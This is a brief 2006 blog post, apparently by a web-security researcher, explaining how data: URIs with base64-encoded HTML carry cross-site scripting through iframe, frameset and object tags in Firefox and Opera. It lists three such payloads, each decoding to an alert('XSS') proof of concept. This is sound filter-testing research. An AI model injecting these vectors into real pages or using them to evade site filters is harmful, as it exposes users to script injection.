I was talking with Jake Reynolds today and he brought my attention to the fact that I hadn’t spent much time explaining the data: directive, nor had I expounded on the various attack vectors. I’m not 100% sure it’s worth adding more of this to the XSS Cheat Sheet since it is re-hashing an existing vector, but it’s definitely worth mentioning here.

Firstly, it is not limited only to the <META tag, but rather it can be in a number of different vectors. These function in Firefox and Opera:

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></iframe>

<FRAMESET><FRAME SRC="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></FRAMESET>

And this one is specific to Opera:
<OBJECT TYPE="text/x-scriptlet" DATA="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></OBJECT>

That’s about it for now. I’ll have to think about this some more. Enjoy!

This entry was posted on Monday, June 5th, 2006 at 4:17 pm and is filed under XSS, Webappsec. You can leave a response as well.